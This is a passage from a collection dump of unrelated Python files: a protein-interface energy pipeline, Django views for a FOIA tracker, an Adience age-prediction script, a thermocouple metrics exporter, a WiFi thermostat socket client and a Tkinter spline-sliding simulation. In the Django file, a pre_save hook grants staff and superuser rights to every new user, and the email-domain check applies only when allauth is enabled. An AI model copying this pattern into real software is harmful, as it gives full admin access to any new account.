    if os.path.exists(os.path.join(RESULTS_DIR, 'Ndrieding.csv')) and os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv')):
        print('Skipping hydrophobic calculations since file already exists.')
    if not os.path.exists(os.path.join(RESULTS_DIR, 'Ndrieding.csv')) or not os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv')):
        #the Ndrieding.csv is needed if electrostatic-hydrophobic.csv does not exist because it loads the Hbonds into the database
        with open(os.path.join(RESULTS_DIR, 'Ndrieding.csv'), 'w') as driedingResult:
            print('PDB,DonorChain,DonorResId,DonorSymbol,AccChain,AccResId,AccSymbol,Energy', file=driedingResult)
            pdbs = os.listdir(PDBS_DIR)
            for pdbName in pdbs:
                # only files whose 4-letter PDB id was requested
                if pdbName[0:4] not in pdbsNamesToChains: continue
                pdb = PDBReader.readFile(os.path.join(PDBS_DIR, pdbName), pdbsNamesToChains[pdbName[0:4]])
                interfaceAtoms = getInterfaceAtoms(cursor, pdb)
                bonds = hbonds(pdb)
                bonds.HDPlusDefinition = False
                cBondList = bonds.hbonds(interfaceAtoms)
                print('Calcing Hbonds for %s' % pdb.name)
                for donor, acceptor, eng in cBondList:
                    toPrint = [pdb.name, donor.chain, donor.resId, donor.symbol, acceptor.chain, acceptor.resId,
                               acceptor.symbol, eng]
                    print(','.join([str(a) for a in toPrint]), file=driedingResult)
        # Bulk-load the fresh CSV into the Ndrieding table.
        cursor.execute('''
load data local infile '%s' into table Ndrieding
fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
ignore 1 lines (PDB,DonorChain,DonorResId,DonorSymbol,AccChain,AccResId,AccSymbol,Energy);
''' % (os.path.join(RESULTS_DIR, 'Ndrieding.csv')))
        conn.commit()
    # --- Van der Waals energy between the interfaces ---
    if os.path.exists(os.path.join(RESULTS_DIR, 'interfaceVDW.csv')):
        print('Skipping VDW energy calculations since file already exists.')
    if not os.path.exists(os.path.join(RESULTS_DIR, 'interfaceVDW.csv')):
        print('Calculating VDW energy between interfaces')
        with open(os.path.join(RESULTS_DIR, 'interfaceVDW.csv'), 'w') as vdw_result:
            print('PDB,VDV,VDVx,clashV,clashS', file=vdw_result)
            for pdb, chains in pdbsNamesToChains.items():
                print('Calcing VDW for %s' % pdb)
                pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdb)
                sumVDW, sumVDWx, clashV, clashS = VDW.calcCompl(pdb_path, chains)
                print(','.join([pdb, str(sumVDW), str(sumVDWx), str(clashV), str(clashS)]), file=vdw_result)
        cursor.execute('''
load data local infile '%s' into table interfaceVDW
fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
ignore 1 lines (PDB,VDV,VDVx6,ClashV,ClashS);
''' % (os.path.join(RESULTS_DIR, 'interfaceVDW.csv')))
        conn.commit()
    # --- Electrostatic (Coulomb) energy of paired interface charges ---
    if os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic.csv')):
        print('Skipping electrostatic charge calculations since file already exists.')
    if not os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic.csv')):
        print('Calculating electrostatic charges (Coulomb of paired charges except hydrogen bonds)')
        with open(os.path.join(RESULTS_DIR, 'electrostatic.csv'), 'w') as electro_res:
            print('PDB,eCoulomb,pp,mm,pm', file=electro_res)
            for pdb, chains in pdbsNamesToChains.items():
                pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdb)
                # rebinds `pdb` from name string to parsed structure
                pdb = PDBReader.readFile(pdb_path, chains)
                interfaceAtoms = getInterfaceAtoms(cursor, pdb)
                e, pp, mm, pm = electrostat.calcElectrostatic(pdb, interfaceAtoms)
                print('%s,%f,%i,%i,%i' % (pdb.name, e, pp, mm, pm), file=electro_res)
        cursor.execute('''
load data local infile '%s' into table electrostat
fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
ignore 1 lines (PDB,electro,pp,mm,pm);
''' % (os.path.join(RESULTS_DIR, 'electrostatic.csv')))
        conn.commit()
    # --- Charged-vs-hydrophobic contacts (CSV only; not loaded into the DB) ---
    if os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv')):
        print('Skipping electrostatic-hydrophobic interaction calculations since file already exists.')
    if not os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv')):
        print('Calculating intermolecular electrostatic charges contacts with hydrophobic residues')
        with open(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv'), 'w') as electro_hydro_res:
            print('inter-chain interactions', file=electro_hydro_res)
            print('\nPDB Name,charged atom chain,charged atom resID,charged atom residue,charged atom symbol,charged atom depth,charge,hydrophobic atom chain,hydrophobic atom resID,hydrophobic atom residue,hydrophobic atom symbol', file=electro_hydro_res)
            for pdbName, chains in pdbsNamesToChains.items():
                # NOTE(review): pdbName is already a key of pdbsNamesToChains,
                # so this membership check looks redundant — confirm.
                if pdbName[0:4] not in pdbsNamesToChains: continue
                pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName)
                pdb = PDBReader.readFile(pdb_path, chains)
                interfaceAtoms = getInterfaceAtoms(cursor, pdb)
                depthDistances = residue_depth(pdbName[:4], interfaceAtoms, pdb_path, UseInterfaceAtoms=True)
                inter_hydrophobic_charged_interactions = electrostat.calcInterElectroHydrophobic(pdb, interfaceAtoms, depthDistances)
                for charged_atom, depth, charge, hydrophobic_atom in inter_hydrophobic_charged_interactions:
                    print(','.join([pdbName, charged_atom.chain, str(charged_atom.resId), charged_atom.residue, charged_atom.symbol, str(depth), charge, hydrophobic_atom.chain, str(hydrophobic_atom.resId), hydrophobic_atom.residue, hydrophobic_atom.symbol]), file=electro_hydro_res)
            print('Calculating intramolecular electrostatic charges contacts with hydrophobic residues')
            print('\nintra-chain interactions', file=electro_hydro_res)
            print('\nPDB Name,charged atom chain,charged atom resID,charged atom residue,charged atom symbol,charged atom depth,charge,hydrophobic atom chain,hydrophobic atom resID,hydrophobic atom residue,hydrophobic atom symbol', file=electro_hydro_res)
            for pdbName, chains in pdbsNamesToChains.items():
                if pdbName[0:4] not in pdbsNamesToChains: continue
                pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName)
                pdb = PDBReader.readFile(pdb_path, chains)
                interfaceAtoms = getInterfaceAtoms(cursor, pdb)
                depthDistances = residue_depth(pdbName[:4], interfaceAtoms, pdb_path, UseInterfaceAtoms=True)
                intra_hydrophobic_charged_interactions = electrostat.calcIntraElectroHydrophobic(pdb, interfaceAtoms, depthDistances)
                for charged_atom, depth, charge, hydrophobic_atom in intra_hydrophobic_charged_interactions:
                    print(','.join([pdbName, charged_atom.chain, str(charged_atom.resId), charged_atom.residue, charged_atom.symbol, str(depth), charge, hydrophobic_atom.chain, str(hydrophobic_atom.resId), hydrophobic_atom.residue, hydrophobic_atom.symbol]), file=electro_hydro_res)
    # --- Cavity/gap volume (Monte Carlo approximation) ---
    if os.path.exists(os.path.join(RESULTS_DIR, 'cavity_vol.csv')):
        print('Skipping cavity calculations since file already exists.')
    if not os.path.exists(os.path.join(RESULTS_DIR, 'cavity_vol.csv')):
        print('Approximating cavities/gaps volume by monte carlo')
        with open(os.path.join(RESULTS_DIR, 'cavity_vol.csv'), 'w') as cavity_res:
            print('PDB,cavity_vol', file=cavity_res)
            pdbs = os.listdir(PDBS_DIR)
            for pdbName in pdbs:
                if pdbName[0:4] not in pdbsNamesToChains: continue
                pdb = PDBReader.readFile(os.path.join(PDBS_DIR, pdbName), pdbsNamesToChains[pdbName[0:4]])
                interfaceAtoms = getInterfaceAtoms(cursor, pdb)
                cavities_vol_approx = calculateVolume(pdb, interfaceAtoms)
                print('%s,%f' % (pdb.name, cavities_vol_approx), file=cavity_res)
    # --- Residue depth for all atoms ---
    if os.path.exists(os.path.join(RESULTS_DIR, 'residue_depth.csv')):
        print('Skipping residue depth calculations since file already exists.')
    if not os.path.exists(os.path.join(RESULTS_DIR, 'residue_depth.csv')):
        print('Calculating Residue Depth')
        pdbs = os.listdir(PDBS_DIR)
        with open(os.path.join(RESULTS_DIR, 'residue_depth.csv'), 'w') as res_depth:
            print('PDB,chain,resId,residue,atom symbol,atom depth', file=res_depth)
            for pdbName in pdbs:
                if pdbName[0:4] not in pdbsNamesToChains: continue
                pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName[:4])
                # NOTE(review): second arg here is the 4-letter name string,
                # unlike the chain lists passed elsewhere — confirm intended.
                pdb = PDBReader.readFile(pdb_path, pdbName[:4])
                depthDistances = residue_depth(pdbName[:4], pdb.atoms, pdb_path)
                for atom, dist in depthDistances:
                    print(','.join([pdbName[:4], atom.chain, str(atom.resId), atom.residue, atom.symbol, str(dist)]), file=res_depth)
    cursor.close()
    conn.close()
if __name__ == "__main__":
    # CLI driver: download PDBs, compute interface CSVs, then build the DB
    # and run the post-creation energy-term calculations.
    parser = argparse.ArgumentParser(description="Setup/download protein database based on PDB")
    parser.add_argument("pdbList", help="A file with a list of PDB to download")
    parser.add_argument("--folder", help="Name of the folder to contain downloaded files")
    parser.add_argument("--dbName", help="Name of the database to create.")
    args = parser.parse_args()
    if args.pdbList is None:
        sys.exit("Please provide a file with list of PDBs to anaylze")
    # Default working dir: the directory containing the PDB list file.
    WORKING_DIRECTORY = args.folder if args.folder is not None else os.path.dirname(os.path.abspath(args.pdbList))
    print('WORKING DIR: %s' % WORKING_DIRECTORY)
    PDBS_DIR = os.path.join(WORKING_DIRECTORY, 'pdbs')
    pdbReader.PDBS_DIR = PDBS_DIR
    RESULTS_DIR = os.path.join(WORKING_DIRECTORY, 'results')
    for dir in [PDBS_DIR, RESULTS_DIR]:
        if not os.path.exists(dir):
            os.mkdir(dir)
    # List lines look like "name" or "name_A:B"; '#'-prefixed lines are comments.
    pdbsToAnalyzeWithChains = [pdb.strip().upper().split("_") for pdb in open(args.pdbList, 'r') if
                               pdb[0:1] != '#']  # todo: add treatment for chains specificatin instad of [0:4]
    pdbsToAnalyze = [pdb[0] for pdb in pdbsToAnalyzeWithChains]
    download_DB(pdbsToAnalyze)  # download from PDB bank and add hydrogens
    createInterfaceCSV(pdbsToAnalyzeWithChains)  # define interface by distance and by asa
    print('''The script will now create DB. DB is required for extra calculations
including VDW and hydrogen bonds
''')
    try:
        if args.dbName:
            DBConfig.DB_NAME = args.dbName
        DBConfig.init_connection()
        createDataBase(pdbsToAnalyzeWithChains)
        # post database creation scripts
        fillInterfacePeriphrial(pdbsToAnalyzeWithChains)
        calcEnergyTerms(pdbsToAnalyzeWithChains)
    except KeyboardInterrupt:
        # Ctrl-C is treated as "skip the DB step", not as an error.
        print('DB will not be created. Use ./results table to see the results')
|
nilq/baby-python
|
python
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, Http404, JsonResponse
from .models import Foia, Agency, Tag, SpecialPerson
from django.dispatch import receiver
from django.db.models.signals import pre_save
from django.contrib.auth.models import User
from datetime import date
from django.contrib.auth.decorators import login_required
from django.contrib.postgres.search import SearchQuery, SearchRank, SearchVector
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.conf import settings
from datetime import datetime
@receiver(pre_save, sender=User)
def prepare_user(sender, instance, **kwargs):
    """pre_save hook for User: gate new accounts by email domain and grant
    staff/superuser to every newly-created user.

    Raises Http404 when allauth is in use and the new user's email is not in
    the allowed login domain.
    """
    if instance._state.adding is True:
        ## Don't add users not from the nytimes.com email domain.
        ## or a few whitelisted emails for testing.
        if settings.USE_ALLAUTH:
            if instance.email and settings.ALLOWABLE_LOGIN_DOMAIN and not instance.email.split('@')[1] == settings.ALLOWABLE_LOGIN_DOMAIN:
                # BUG FIX: this referenced bare ALLOWABLE_LOGIN_DOMAIN, which is
                # undefined here and raised NameError instead of the intended 404.
                raise Http404('Please login with your {} email address.'.format(settings.ALLOWABLE_LOGIN_DOMAIN))
        instance.is_staff = True
        instance.is_superuser = True
# you may want to have the front-page of the site (listing all the foias)
# require you to log in to see it.
# if so, just uncomment this.
# @login_required()
def index(request):
    """Front page: latest FOIAs, the current user's FOIAs, their default
    project's FOIAs, and a few dashboard counters.
    """
    latest_foias = sorted(Foia.objects.order_by('-filed_date')[:50], key=lambda f: f.sort_order())
    if request.user.is_anonymous:
        my_foias = []
    else:
        my_foias = sorted(Foia.objects.filter(reporter=request.user), key=lambda f: f.sort_order())
    my_foias_set = set(my_foias)
    project_foias = []
    try:
        if not request.user.is_anonymous and request.user.specialperson.default_project:
            project_foias = sorted(Foia.objects.filter(tags=request.user.specialperson.default_project), key=lambda f: f.sort_order())
            # NOTE(review): project_name is assigned but never used or passed
            # to the template — dead store, or missing from the context below?
            project_name = request.user.specialperson.default_project.name
    except SpecialPerson.DoesNotExist:
        # User has no SpecialPerson record: no default project to show.
        pass
    # for the dashboard thingy
    my_foias_count = len(my_foias_set) if not request.user.is_anonymous else 0
    all_foias_count = Foia.objects.count()
    percent_overdue = "TK" #Foia.objects.filter(reporter=request.user).count() / ??
    percent_complete = int(float(Foia.objects.filter(received_response=True).filter(response_satisfactory=True).count())/all_foias_count*100) if not all_foias_count == 0 else "n/a"
    # Don't repeat the user's own FOIAs in the "latest" column.
    latest_foias = [item for item in latest_foias if item not in my_foias_set]
    return render(request, 'foias/index.html',
                  {'latest_foias': latest_foias,
                   'my_foias': my_foias,
                   'project_foias': project_foias,
                   'warn_about_holidays': date.today()>date(2020, 11, 1),
                   'my_foias_count': my_foias_count,
                   'all_foias_count': all_foias_count,
                   'percent_overdue': percent_overdue,
                   'percent_complete': percent_complete,
                   })
def project(request, tag_id):
    """Render every FOIA carrying the given project tag."""
    tag_name = Tag.objects.get(id=tag_id).name
    tagged_foias = sorted(Foia.objects.filter(tags__id=tag_id), key=lambda foia: foia.sort_order())
    context = {
        'project_foias': tagged_foias,
        'project_name': tag_name,
        'warn_about_holidays': date.today() > date(2020, 11, 1),
    }
    return render(request, 'foias/project.html', context)
def addten(request):
    """Return JSON with the date ten business days after ?date=YYYY-MM-DD."""
    business_days = 10
    # Parse the query-string date (local variable renamed so it no longer
    # shadows the imported `date` class).
    start = datetime.strptime(request.GET["date"], "%Y-%m-%d")
    foia = Foia()
    later = foia.cal.addbusdays(start, business_days).date()
    return JsonResponse({'old_date': start, 'new_date': later, 'days_added': business_days})
def healthcheck(request):
    """Liveness probe: always answer 200 with an empty plain-text body."""
    response = HttpResponse('', content_type="text/plain", status=200)
    return response
def all(request):
    """this page lists ALL the requests and is probably best for the lawyers or whoever"""
    # NOTE: the view name shadows the builtin all(); kept because urls.py
    # references this name.
    paginator = Paginator(Foia.objects.all(), 25)
    requested_page = request.GET.get('page')
    try:
        page_of_foias = paginator.page(requested_page)
    except PageNotAnInteger:
        # No/invalid page number: show the first page.
        page_of_foias = paginator.page(1)
    except EmptyPage:
        # Past the end: clamp to the last page.
        page_of_foias = paginator.page(paginator.num_pages)
    return render(request, 'foias/all.html', {'result_foias': page_of_foias})
# full text search method.
def search(request):
    """Postgres full-text search over FOIA fields; top 50 results by rank."""
    query_string = request.GET['q']
    query = SearchQuery(query_string, config='simple')
    vector = SearchVector(
        'reporter__first_name', 'reporter__last_name', 'agency__name',
        'request_subject', 'request_notes', 'request_number', 'submission_notes',
        'response_notes', 'response_url', 'lawsuit_notes', config='simple')
    matches = (Foia.objects
               .annotate(rank=SearchRank(vector, query), search=vector)
               .filter(search=query_string)
               .order_by('-rank')[:50])
    return render(request, 'foias/search.html', {'result_foias': matches, 'query': query_string})
# # this is not implemented!
# but if you wanted a page for showing details of a FOIA other than the edit page, this would be where to do it.
# you'd also have to change foias/urls.py
# def detail(request, foia_id):
# foia = get_object_or_404(Foia, pk=foia_id)
# return render(request, 'foias/detail.html', {'foia': foia})
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# Marcus de Assis Angeloni <marcus.angeloni@ic.unicamp.br>
# Rodrigo de Freitas Pereira <rodrigodefreitas12@gmail.com>
# Helio Pedrini <helio@ic.unicamp.br>
# Wed 6 Feb 2019 13:00:00
from __future__ import division
import tensorflow as tf
import os
import csv
import numpy as np
import sys
import argparse
from datetime import datetime
from tqdm import tqdm
# read the list file from protocol and return the trials and respective ground truth
# read the list file from protocol and return the trials and respective ground truth
def list_images(list_file):
    """Parse a space-delimited protocol file of "<image> <label>" rows.

    Returns (trials, ground_truth): the image names as a list of str and the
    integer labels as a numpy array.
    """
    trials = []
    labels = []
    with open(list_file, 'r') as csvfile:
        for row in csv.reader(csvfile, delimiter=" "):
            trials.append(row[0])
            labels.append(int(row[1]))
    return trials, np.array(labels)
#################
# main block
#################

# Get arguments
parser = argparse.ArgumentParser(description = 'Predict and compute metrics of a fold from ADIENCE Dataset')
parser.add_argument('facialparts_dir', default = '', help = 'Full path of facial parts images')
parser.add_argument('protocol_dir', default = '', help = 'Full path of protocol files')
parser.add_argument('model_path', default = '', help = 'Full path of CNN trained model')
parser.add_argument('fold', default='', help = 'Fold number [0-4]')
args = parser.parse_args()

# Validate arguments up front; each message names the path that failed.
if not os.path.exists(args.facialparts_dir):
    print('Facial parts images (\"' + args.facialparts_dir + '\") not found.')
    exit()
if not os.path.exists(args.protocol_dir):
    # BUG FIX: this message previously interpolated args.model_path, so a
    # missing protocol dir reported the wrong path.
    print('Protocol files (\"' + args.protocol_dir + '\") not found.')
    exit()
if not os.path.exists(args.model_path):
    print('Model (\"' + args.model_path + '\") not found.')
    exit()
if int(args.fold) < 0 or int(args.fold) > 4:
    print('Fold (\"' + args.fold + '\") not supported.')
    exit()

model_path = args.model_path
fold = args.fold
protocol_dir = args.protocol_dir
facialparts_dir = args.facialparts_dir

print(datetime.now().strftime('%d/%m/%Y %H:%M:%S') + " - Prediction started")
print("Model path: " + model_path)
print("Fold: " + fold)

# list file with test trials
test_path = os.path.join(protocol_dir, "test_fold_is_" + str(fold), "age_test.txt")
trials, ground_truth = list_images(test_path)

# trained model (TF1 SavedModel wrapped in a predictor)
model = tf.contrib.predictor.from_saved_model(model_path)

pred = []
for trial in tqdm(trials):
    # load facial parts as raw encoded image bytes
    with open(os.path.join(facialparts_dir, "eyebrows", trial), 'rb') as f:
        eyebrows_bytes = f.read()
    with open(os.path.join(facialparts_dir, "eyes", trial), 'rb') as f:
        eyes_bytes = f.read()
    with open(os.path.join(facialparts_dir, "nose", trial), 'rb') as f:
        nose_bytes = f.read()
    with open(os.path.join(facialparts_dir, "mouth", trial), 'rb') as f:
        mouth_bytes = f.read()
    # inference: predicted class is the argmax over the softmax output
    predict = model({'eyebrows':[eyebrows_bytes], 'eyes':[eyes_bytes], 'nose':[nose_bytes], 'mouth':[mouth_bytes]})
    pred.append(predict['softmax'][0].argmax())

# metrics: exact accuracy and 1-off (adjacent age bucket) accuracy
pred = np.array(pred)
np.savetxt(os.path.join(protocol_dir, str(fold) + "predictions.txt"), pred)
correct = (pred == ground_truth)
correct_1off = (np.abs(pred - ground_truth) <= 1)
print("Total trials: " + str(correct.size))
print("Accuracy: " + str(float(correct.sum()) / correct.size))
print("Accuracy 1-off: " + str(float(correct_1off.sum()) / correct_1off.size))
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import mcp9600
import time
from prometheus_client import start_http_server, Gauge
# Prometheus exporter for an MCP9600 thermocouple amplifier.
# NOTE(review): loop-body indentation was reconstructed from a
# whitespace-stripped source; print/sleep are assumed to run every
# iteration (not only when t > -10) — confirm on the device.
m = mcp9600.MCP9600()
m.set_thermocouple_type('K')  # K-type thermocouple
# Apparently the default i2c baudrate is too high; you need to lower it:
# set the following line in the Pi's /boot/config.txt file
#   dtparam=i2c_arm=on,i2c_arm_baudrate=40000
# Source:
#   https://forums.pimoroni.com/t/mcp9600-breakout-pim437/13129/3
#   https://www.raspberrypi-spy.co.uk/2018/02/change-raspberry-pi-i2c-bus-speed/
start_http_server(8002)  # metrics endpoint on :8002
hotGauge = Gauge('roomon_mcp9600_hot_temp', 'Temperature at hot junction of thermocouple in C')
coldGauge = Gauge('roomon_mcp9600_cold_temp', 'Temperature at cold junction of thermocouple in C')
while True:
    t = m.get_hot_junction_temperature()
    c = m.get_cold_junction_temperature()
    d = m.get_temperature_delta()
    # Only publish plausible readings; below -10 C is treated as a glitch.
    if t > -10:
        hotGauge.set(t)
        coldGauge.set(c)
    print(t, c, d)
    time.sleep(10)  # poll every 10 seconds
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 26 18:16:22 2019
@author: johncanty
"""
import socket
import re
def wifistat_send(ip, port, command):
    """Send one command to the thermostat over TCP and return its reply.

    command must already be bytes. A fresh socket is used per command
    (one-shot request/response protocol); only the first 1024 bytes of the
    reply are read, decoded as UTF-8.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(command)
    data = s.recv(1024)
    s.close()
    sdata = data.decode('utf-8')
    return sdata
def login(ip, port, password):
    """Log in to the thermostat and return its 4-digit security code as a str.

    The device replies containing "sucessfully" [sic] plus a 4-digit code on
    success; on failure the sentinel string '666' is returned.
    """
    command = str('*GUP' + password + '*L_I')
    response = str(wifistat_send(ip, port, str.encode(command)))
    if re.search("(sucessfully)", response) is not None:
        # re.findall returns a list, so str() of it looks like "['1234']" —
        # the strip("['']") below peels off the list punctuation.
        seccode = str(re.findall('(\d{4})', response))
    else:
        # BUG FIX: this was the int 666; seccode.strip(...) below then raised
        # AttributeError on every failed login. Use the string form instead.
        seccode = '666'
    seccode = seccode.strip("['']")
    return seccode
def send_schedule(ip, port, seccode, day, schedule):
    """Write one day's schedule to the thermostat; 0 on success, 1 on failure."""
    payload = str(day + ';' + schedule + ':' + seccode + '*W_S')
    reply = str(wifistat_send(ip, port, str.encode(payload)))
    # The device acknowledges a successful write with "W_S1".
    if re.search("(W_S1)", reply) is None:
        return 1
    return 0
def set_time(ip, port, seccode, time):
    """Set the thermostat clock; 0 on success, 1 on failure."""
    payload = str(time + ':' + seccode + '*S_T')
    reply = str(wifistat_send(ip, port, str.encode(payload)))
    # The device acknowledges a successful time set with "S_T1".
    if re.search("(S_T1)", reply) is None:
        return 1
    return 0
# Get the security code from the thermostat. This is usually a 4 digit number that lets the thermostat
# Know that you have logged in sucessfully.
#seccode = str(login('10.10.11.54', int(8899), 'test'))
# Send a schedule to the thermostat
#W,6,0,67,70; W is wake The first digit is the Hour the second the minute Followed by the temp setpoints.
#W - Wake
#L - Leave
#R - Return
#S - Sleep
#To Write a schedule for Friday Day = 6
#W,4,30,67,70;L,7,0,60,65;R,19,0,67,70;S,22,0,60,65
#print(send_schedule('10.10.11.54', int(8899), seccode, '6', 'W,4,30,67,70;L,6,30,60,65;R,19,0,67,70;S,22,0,60,65'))
|
nilq/baby-python
|
python
|
import tkinter as tk
from tkinter import *
import time
import numpy as np
import math
from copy import copy
from RestraintedEOM import MassPointRestraintedCurveSimulator
# Canvas space and simulation space are treated separately:
# feeding raw canvas coordinates into the simulation would make the values
# large and increase the numerical error.
class MainForm(tk.Frame):
    """Tk window for editing a spline and simulating a bead sliding along it.

    The canvas works in pixels; the simulator works in normalized [0, 1]
    coordinates, so points are scaled when crossing the boundary.
    NOTE(review): indentation was reconstructed from a whitespace-stripped
    source; ambiguous spots are flagged inline.
    """
    def __init__(self, master=None, width=500, height=500):
        super().__init__(master)
        self.master = master
        self.pack()
        self.window_width = width + 200   # extra room for the button column
        self.window_height = height + 50
        self.canvas_width = width
        self.canvas_height = height
        self.initWidgets()
        self.ctrl_p_radius = 10           # pixel radius for drawing/picking control points
        self.is_pick_ctrl_p = False
        self.pick_ctrl_p_index = -1       # dragged control point index, -1 when none
        self.is_simu_running = False
        self.max_ctrl_p_num = 10
        self.is_mouse_on_curve = False
        self.select_curve_index = -1      # segment index the mouse hovers
        self.dist_mouse_to_curve_th = 0.01  # distance threshold in simulation space
        self.simulator = MassPointRestraintedCurveSimulator()
        # Fixed end control point in the bottom-right corner of the canvas.
        self.addControlPoint([self.canvas_width - self.ctrl_p_radius, self.canvas_height - self.ctrl_p_radius])
        size = str(self.window_width)+"x"+str(self.window_height)
        self.master.geometry(size)
    def draw_canvas(self):
        """Clear and redraw the curve and the control points."""
        self.canvas.delete("line")
        self.canvas.delete("ctrl_p")
        self.canvas.delete("mass_point")
        self.draw_curve()
        self.draw_ctrl_p()
    def draw_curve(self):
        """Draw the spline as a polyline; green while the mouse hovers it."""
        points = self.simulator.spline.sampling(10)
        if self.is_mouse_on_curve:
            color = "green"
        else:
            color = "black"
        for i in range(len(points)-1):
            self.canvas.create_line(points[i][0]*self.canvas_width, points[i][1]*self.canvas_height, points[i+1][0]*self.canvas_width, points[i+1][1]*self.canvas_height, tag="line", fill=color, width=5)
    def draw_ctrl_p(self):
        """Draw control points; the last (end) point red, the rest blue.

        NOTE(review): p[0]/p[1] are scaled in place, which mutates the
        spline's control points unless control_points hands back copies —
        confirm against MassPointRestraintedCurveSimulator.
        """
        ctrl_ps = self.simulator.spline.control_points
        color = "red"
        for p in reversed(ctrl_ps):
            p[0] *= self.canvas_width
            p[1] *= self.canvas_height
            self.canvas.create_oval(p[0]-self.ctrl_p_radius, p[1]-self.ctrl_p_radius, p[0]+self.ctrl_p_radius, p[1]+self.ctrl_p_radius, fill=color, tag="ctrl_p")
            color = "blue"
    def addControlPoint(self, point):
        """Append a control point given in canvas (pixel) coordinates."""
        if len(self.simulator.spline.control_points) - 1 >= self.max_ctrl_p_num:
            return
        point_copy = copy(point)
        # pixels -> normalized simulation coordinates
        point_copy[0] /= self.canvas_width
        point_copy[1] /= self.canvas_height
        self.simulator.spline.addControlPoint(point_copy)
        self.draw_canvas()
    # Insert at the given index (0 = head of the curve).
    def insertControlPoint(self, point, index):
        if len(self.simulator.spline.control_points) - 1 >= self.max_ctrl_p_num:
            return
        point_copy = copy(point)
        point_copy[0] /= self.canvas_width
        point_copy[1] /= self.canvas_height
        self.simulator.spline.insertControlPoint(point_copy, index)
        self.draw_canvas()
    def pickCtrl(self, point_on_canvas):
        """Return the index of the control point under the cursor, or -1."""
        control_points = self.simulator.spline.control_points
        for index in range(len(control_points)-1): # the last control point cannot be moved
            point = control_points[index]
            dx = point_on_canvas[0] - self.canvas_width*point[0]
            dy = point_on_canvas[1] - self.canvas_height*point[1]
            if (dx**2 + dy**2)< self.ctrl_p_radius**2:
                return index
        return -1
    def onLeftClick(self, evt):
        """Left click: pick an existing control point, or insert a new one."""
        if self.is_simu_running:
            return
        self.pick_ctrl_p_index = self.pickCtrl([evt.x, evt.y])
        if self.pick_ctrl_p_index >= 0:
            return
        if self.is_mouse_on_curve:
            # Clicked on the curve: insert into the hovered segment.
            self.insertControlPoint([evt.x, evt.y], self.select_curve_index)
        else :
            self.insertControlPoint([evt.x, evt.y], 0)
    def onRightClick(self, evt):
        """Right click: delete the control point under the cursor."""
        if self.is_simu_running:
            return
        control_points = self.simulator.spline.control_points
        for index in range(len(control_points)-1): # the last control point cannot be deleted
            point = control_points[index]
            dx = evt.x - point[0] * self.canvas_width
            dy = evt.y - point[1] * self.canvas_height
            if (dx**2 + dy**2)< self.ctrl_p_radius**2:
                self.simulator.spline.removeControlPoint(index)
                self.draw_canvas()
                break
    def startSimulation(self):
        """Run the bead-on-curve simulation until stopped or the end is reached."""
        ctrl_ps = self.simulator.spline.control_points
        # Do nothing with fewer than 2 control points (no curve generated yet).
        if len(ctrl_ps) < 2:
            return
        self.start_btn.config(state="disable")
        self.is_simu_running = True
        start_point = ctrl_ps[0]
        norm = self.simulator.spline.getDifferentialValue(0)
        norm = norm[0]**2 + norm[1]**2
        E = 0.01 # give just enough energy to be able to go slightly off-screen
        U = -9.80665 * start_point[1]
        V = np.sqrt(2*(E-U)/norm)
        domain_of_def = [0, len(ctrl_ps) - 1]  # spline parameter range
        dt = 0.001
        init_condition = [0, V]
        # All time units are seconds.
        sec_per_frame = 1/30
        elapsed_time = 0
        update_speed = 16  # integration steps per rendered frame
        while(True):
            if not(self.is_simu_running):
                break
            start_loop = time.perf_counter()
            for i in range(update_speed):
                _, solve = self.simulator.timeDevelop([elapsed_time, elapsed_time+dt], init_conditions=init_condition)
                s = solve[0][len(solve[0])-1]
                elapsed_time += dt
                # If the point tries to leave the curve, clamp the parameter
                # and flip the velocity (bounce at the boundary).
                if s < domain_of_def[0]:
                    s = domain_of_def[0]
                    solve[1][len(solve[1])-1] *= -1
                elif s > domain_of_def[1]:
                    s = domain_of_def[1]
                    solve[1][len(solve[1])-1] *= -1
                    break
                init_condition=[solve[0][len(solve[0])-1], solve[1][len(solve[1])-1]]
            p = self.simulator.spline.getValue(s)
            p[0] = int(p[0] * self.canvas_width)
            p[1] = int(p[1] * self.canvas_height)
            self.canvas.delete("mass_point")
            self.canvas.create_oval(p[0]-self.ctrl_p_radius, p[1]-self.ctrl_p_radius, p[0]+self.ctrl_p_radius, p[1]+self.ctrl_p_radius, fill="green", tag="mass_point")
            self.canvas.update()
            # Sleep away the remainder of the frame budget; warn when the
            # simulation step overran the frame ("処理落ち" = frame drop).
            if time.perf_counter() - start_loop < sec_per_frame:
                time.sleep((sec_per_frame - (time.perf_counter() - start_loop))/1.1)
            else:
                print("処理落ち")
            self.elapsed_time_label["text"] = "{:.3f}".format(elapsed_time)
            if s == domain_of_def[1]:
                break
        self.is_simu_running = False
        self.start_btn.config(state="normal")
    def stopSimulation(self):
        """Ask the simulation loop to stop at its next iteration."""
        self.is_simu_running = False
    def clearCtrlPs(self):
        """Remove every control point except the fixed end point."""
        if self.is_simu_running:
            return
        ctrl_ps = self.simulator.spline.control_points
        for i in range(len(ctrl_ps)-1):
            self.simulator.spline.removeControlPoint(0)
        self.draw_canvas()
    def onRelease(self, evt):
        self.pick_ctrl_p_index = -1
    def onDragg(self, evt):
        """Drag the picked control point, clamped to the canvas."""
